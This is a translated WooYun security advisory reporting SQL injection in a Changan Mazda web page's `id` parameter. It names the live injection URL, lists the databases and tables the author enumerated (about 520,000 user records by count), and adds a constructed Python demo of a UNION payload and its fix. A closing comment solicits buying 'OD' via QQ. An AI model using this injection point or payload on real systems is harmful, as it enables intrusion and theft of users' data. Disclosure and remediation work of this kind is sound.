
Vulnerability summary

Defect ID: wooyun-2015-0142614

Title: SQL injection on a Changan Mazda site (22 databases / information of about 520,000 users exposed)

Vendor: Changan Mazda Automobile Co., Ltd. (长安马自达汽车有限公司)

Author: wps2015

Submitted: 2015-09-21 19:38

Fix deadline: 2015-09-26 19:40

Published: 2015-09-26 19:40

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-21: Details sent to the vendor, awaiting the vendor's response
2015-09-26: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection

Detailed description:

Injection point: http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191 (the `id` query-string parameter is injectable)

(screenshot: 1.png)


available databases [22]:
[*] aaa
[*] car
[*] car_bak
[*] changanmzd
[*] changanmzd2015
[*] chetie
[*] ct
[*] cx
[*] cx5
[*] cx5_2015
[*] cx5_818
[*] cx5wrzy
[*] information_schema
[*] market2015
[*] market_babaquna
[*] mazda
[*] mazda_yumatravel
[*] mazida
[*] mysql
[*] performance_schema
[*] test
[*] yumazu


The `car` database:

Database: car
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `user` | 259935 |
| user_bak | 187556 |
| message | 176399 |
| user_friends | 140072 |
| user_friends_view | 139864 |
| customers | 95419 |
| user_car | 73841 |
| user_feed | 64592 |
| photo | 60200 |
| guestbook | 47854 |
| guestbook_view | 47852 |
| blog | 37284 |
| user_gifts | 31795 |
| visitors | 30966 |
| party_users | 30713 |
| party_users_view | 30530 |
| blog_category | 23671 |
| drive_character | 19823 |
| user_car_bak | 18533 |
| comment | 16903 |
| topic_reply | 14358 |
| topic_reply_view | 14353 |
| blog_comment | 12364 |
| blog_comment_view | 12357 |
| act_users | 10969 |
| act_user_view | 10946 |
| user_act_view | 10575 |
| taskbuffers | 10541 |
| act_signer_view | 10467 |
| activity_signup | 10467 |
| activity_comment | 6663 |
| act_comment_view | 6658 |
| party_sign | 5312 |
| task_usertask | 5099 |
| usertask | 5098 |
| album_category | 4972 |
| album_view | 4972 |
| photo_comment | 3415 |
| photo_comment_view | 3413 |
| vote_options | 3084 |
| party_topic | 2933 |
| user_interests | 2323 |
| record | 2096 |
| answer | 1654 |
| answer_view | 1654 |
| question | 1233 |
| question_view | 1233 |
| baike_user | 1076 |
| baike_user_view | 1076 |
| event | 996 |
| activity | 964 |
| activity_view | 963 |
| vote_users | 957 |
| repaste | 903 |
| repaste_view | 903 |
| vote_comment | 645 |
| vote_comment_view | 644 |
| vote | 574 |
| homework_photoes | 534 |
| policy | 371 |
| homework_comment | 275 |
| homework_comment_view | 275 |
| party | 263 |
| party_view | 263 |
| party_apply | 185 |
| baike_comment | 182 |
| baike_comment_view | 182 |
| feedback | 137 |
| goods_users | 135 |
| homework | 89 |
| task | 54 |
| friends_category | 44 |
| baike | 33 |
| repaste_comment | 24 |
| repaste_comment_view | 24 |
| marklist | 23 |
| gift | 18 |
| question_category | 17 |
| flash_banner | 16 |
| party_topic_category | 11 |
| goods | 10 |
| activity_category | 7 |
| car_model | 6 |
| party_category | 5 |
| admin | 3 |
| baike_category | 2 |
| notice | 2 |
+---------------------------------------+---------+


The `user` table alone holds about 250,000 rows (259,935 entries).

(screenshot: 2.png)


Database: yumazu
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ymz_owner_certification | 571284 |
| ymz_common_member_grouppm | 416972 |
| ymz_ucenter_memberfields | 278748 |
| ymz_ucenter_members | 278748 |
| ymz_common_member_count | 277860 |
| ymz_common_member_field_forum | 277860 |
| ymz_common_member_field_home | 277860 |
| ymz_common_member_profile | 277860 |
| ymz_common_member_status | 277860 |
| ymz_common_member | 277858 |
| ymz_common_member_verify | 240800 |
| ymz_forum_post | 67031 |
| ymz_home_notification | 51050 |
| ymz_forum_threadpartake | 48302 |
| ymz_common_district | 45051 |
| ymz_forum_filter_post | 45001 |
| ymz_home_blog | 38755 |
| ymz_home_blogfield | 38755 |
| ymz_common_credit_rule_log | 37893 |
| ymz_forum_attachment | 23878 |
| ymz_common_word | 20914 |
| ymz_common_member_newprompt | 18654 |
| ymz_forum_statlog | 15310 |
| ymz_home_pic | 12807 |
| ymz_common_onlinetime | 11855 |
| ymz_forum_thread | 9483 |
| ymz_forum_threadmod | 7768 |
| ymz_forum_activityapply | 7419 |
| ymz_forum_sofa | 5021 |
| ymz_owner_uservin | 3939 |
| ymz_forum_attachment_unused | 3293 |
| ymz_forum_threadimage | 2787 |
| ymz_common_credit_rule_log_field | 2604 |
| ymz_forum_attachment_8 | 2384 |
| ymz_forum_attachment_1 | 2246 |
| ymz_forum_attachment_2 | 2199 |
| ymz_forum_attachment_9 | 2194 |
| ymz_forum_attachment_0 | 2154 |
| ymz_home_comment | 2101 |
| ymz_ucenter_pm_indexes | 2032 |
| ymz_forum_attachment_7 | 2028 |
| ymz_forum_attachment_6 | 1962 |
| ymz_forum_attachment_5 | 1896 |
| ymz_forum_attachment_3 | 1791 |
| ymz_forum_attachment_4 | 1696 |
| ymz_home_pokearchive | 1680 |
| ymz_owner_certification_bak140314 | 1322 |
| ymz_ucenter_pm_members | 1250 |
| ymz_home_visitor | 1206 |
| ymz_forum_activity | 1107 |
| ymz_common_member_crime | 1099 |
| ymz_forum_post_tableid | 921 |
| ymz_ucenter_notelist | 791 |
| ymz_forum_modwork | 668 |
| ymz_home_album | 656 |
| ymz_ucenter_pm_lists | 632 |
| ymz_common_tagitem | 562 |
| ymz_home_poke | 451 |
| ymz_common_setting | 438 |
| ymz_home_friend | 410 |
| ymz_home_doing | 406 |
| ymz_common_member_stat_field | 404 |
| ymz_home_feed | 316 |
| ymz_forum_rsscache | 312 |
| ymz_common_tag | 285 |
| ymz_ucenter_newpm | 235 |
| ymz_ucenter_pm_messages_4 | 233 |
| ymz_ucenter_pm_messages_5 | 233 |
| ymz_ucenter_pm_messages_6 | 230 |
| ymz_home_friend_request | 229 |
| ymz_ucenter_pm_messages_9 | 229 |
| ymz_common_session | 219 |
| ymz_ucenter_pm_messages_0 | 208 |
| ymz_home_friendlog | 207 |
| ymz_ucenter_pm_messages_8 | 201 |
| ymz_home_favorite | 186 |
| ymz_common_stylevar | 180 |
| ymz_ucenter_pm_messages_3 | 179 |
| ymz_ucenter_pm_messages_1 | 177 |
| ymz_ucenter_pm_messages_7 | 177 |
| ymz_common_block_item_data | 167 |
| ymz_ucenter_pm_messages_2 | 165 |
| ymz_forum_threaddisablepos | 163 |
| ymz_forum_newthread | 133 |
| ymz_forum_hotreply_member | 132 |
| ymz_common_syscache | 117 |
| ymz_home_share | 113 |
| ymz_common_admincp_perm | 111 |
| ymz_forum_hotreply_number | 110 |
| ymz_common_block_style | 103 |
| ymz_home_clickuser | 101 |
| ymz_forum_postcomment | 100 |
| ymz_forum_groupfield | 91 |
| ymz_forum_threadclass | 87 |
| ymz_common_block_pic | 85 |
| ymz_common_smiley | 85 |
| ymz_forum_spacecache | 82 |
| ymz_home_picfield | 74 |
| ymz_home_follow | 60 |
| ymz_common_member_verify_info | 58 |
| ymz_common_nav | 58 |
| ymz_common_member_profile_setting | 51 |
| ymz_forum_forumfield | 50 |
| ymz_forum_forum | 49 |
| ymz_common_block_item | 42 |
| ymz_common_credit_rule | 31 |
| ymz_common_member_action_log | 27 |
| ymz_common_seccheck | 26 |
| ymz_ucenter_settings | 26 |
| ymz_common_usergroup | 22 |
| ymz_common_usergroup_field | 22 |
| ymz_owner_toleadinfo | 22 |
| ymz_portal_article_content | 21 |
| ymz_portal_article_count | 21 |
| ymz_common_cron | 20 |
| ymz_forum_postcache | 19 |
| ymz_portal_article_title | 19 |
| ymz_portal_rsscache | 19 |
| ymz_common_pluginvar | 18 |
| ymz_common_stat | 16 |
| ymz_forum_groupuser | 16 |
| ymz_home_click | 15 |
| ymz_forum_polloption | 14 |
| ymz_common_cache | 13 |
| ymz_common_block | 12 |
| ymz_common_plugin | 12 |
| ymz_common_report | 12 |
| ymz_common_template_block | 12 |
| ymz_home_class | 12 |
| ymz_common_diy_data | 11 |
| ymz_common_failedip | 10 |
| ymz_forum_medal | 10 |
| ymz_gift | 10 |
| ymz_common_credit_log | 9 |
| ymz_common_credit_log_field | 9 |
| ymz_home_docomment | 8 |
| ymz_common_admingroup | 7 |
| ymz_forum_typeoption | 7 |
| ymz_common_admincp_group | 6 |
| ymz_forum_onlinelist | 6 |
| ymz_forum_pollvoter | 6 |
| ymz_forum_poststick | 5 |
| ymz_forum_promotion | 5 |
| ymz_common_admincp_cmenu | 4 |
| ymz_common_failedlogin | 4 |
| ymz_forum_bbcode | 4 |
| ymz_common_block_favorite | 3 |
| ymz_common_grouppm | 3 |
| ymz_common_member_secwhite | 3 |
| ymz_forum_grouplevel | 3 |
| ymz_forum_imagetype | 3 |
| ymz_forum_poll | 3 |
| ymz_gift_send | 3 |
| ymz_portal_category | 3 |
| ymz_ucenter_vars | 3 |
| ymz_common_admincp_member | 2 |
| ymz_common_searchindex | 2 |
| ymz_common_statuser | 2 |
| ymz_common_style | 2 |
| ymz_common_template | 2 |
| ymz_common_word_type | 2 |
| ymz_forum_threadprofile | 2 |
| ymz_forum_warning | 2 |
| ymz_gift_group | 2 |
| ymz_mobile_setting | 2 |
| ymz_portal_article_trash | 2 |
| ymz_portal_attachment | 2 |
| ymz_ucenter_failedlogins | 2 |
| ymz_common_admincp_session | 1 |
| ymz_common_advertisement | 1 |
| ymz_common_remote_port | 1 |
| ymz_gift_user | 1 |
| ymz_ucenter_admins | 1 |
| ymz_ucenter_badwords | 1 |
+---------------------------------------+---------+


The `ymz_ucenter_members` table holds about 270,000 rows (278,748 entries). The table names (`ymz_common_member`, `ymz_ucenter_*`, `ymz_forum_*`, `ymz_home_*`) are those of a Discuz! X / UCenter forum installation, so the member tables carry the forum's account records; together with the 250,000-row `user` table in `car` this is the roughly 520,000 user records the title refers to.

(screenshot: 3.png)


Proof of vulnerability:

(screenshot: 3.png)

Fix suggestion:

Filter the input. The `id` parameter of article.php identifies a row, so it should be validated as an integer before use and, better still, passed to the database as a bound parameter of a prepared statement rather than concatenated into the query text.
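To make the fix concrete, here is an added example (not code from the report or from the Changan Mazda site, whose PHP/MySQL backend is not shown on the page). It models the injectable `article.php?id=` pattern against an in-memory SQLite database with a constructed schema and sample rows; the function names, the `article`/`user` tables and the UNION payload are all assumptions made for the demonstration. It shows the same query written three ways: string concatenation (injectable), parameter binding alone (the payload is treated as data and matches nothing), and integer validation plus binding (the payload is rejected before it reaches the database).

```python
import sqlite3

# Added example, not code from the WooYun report or the Changan Mazda site.
# The real backend (PHP + MySQL behind article.php?id=) is not on the page;
# this models the vulnerable pattern and its fix on SQLite with constructed data.


def make_db():
    """Constructed sample schema: an article table the page is meant to read,
    and a user table that the article query must never be able to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO article VALUES (191, 'Running Men article');
        INSERT INTO article VALUES (192, 'Unpublished draft');
        CREATE TABLE user(uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def fetch_article_vulnerable(conn, article_id):
    """The injectable pattern: the query-string value is pasted into the SQL text,
    so anything after the number is parsed as SQL."""
    sql = "SELECT id, title FROM article WHERE id = " + article_id
    return conn.execute(sql).fetchall()


def fetch_article_bound(conn, article_id):
    """Parameter binding alone: the value is sent as data and never parsed as SQL.
    A payload string simply fails to equal any integer id."""
    sql = "SELECT id, title FROM article WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


def fetch_article_safe(conn, article_id):
    """Validate the type first (an article id is a row number, so only digits
    are acceptable), then bind the integer as a parameter."""
    if not isinstance(article_id, str) or not article_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, title FROM article WHERE id = ?"
    return conn.execute(sql, (int(article_id),)).fetchall()


# Constructed attacker input: a UNION that reads the user table through the
# article query, the kind of statement an injection tool builds once it has
# confirmed the parameter is injectable.
UNION_PAYLOAD = "191 UNION SELECT uid, username || ':' || password FROM user"


if __name__ == "__main__":
    db = make_db()
    print("legit id:    ", fetch_article_vulnerable(db, "191"))
    print("concatenated:", fetch_article_vulnerable(db, UNION_PAYLOAD))
    print("bound param: ", fetch_article_bound(db, UNION_PAYLOAD))
    try:
        fetch_article_safe(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("validated:    rejected:", exc)
```

Binding is the fix; the integer check in front of it is defence in depth and also gives a clean error instead of an empty page when the parameter is malformed. The same applies to every other parameter of the PHP scripts in these `market/` directories, not only `id`.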

Copyright notice: when reposting, credit the source: wps2015@乌云 (WooYun)


Vendor response

Vendor reply:

Severity: No impact, vendor ignored

Ignored at: 2015-09-26 19:40

Vendor comment: (none)

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-09-26 17:57 | 茫茫涯 (Passer-by | Rank:0, vulnerabilities:1 | works in Zhengzhou in network security and programming)

    Buying OD at a high price; if you have any, contact QQ: 1291806522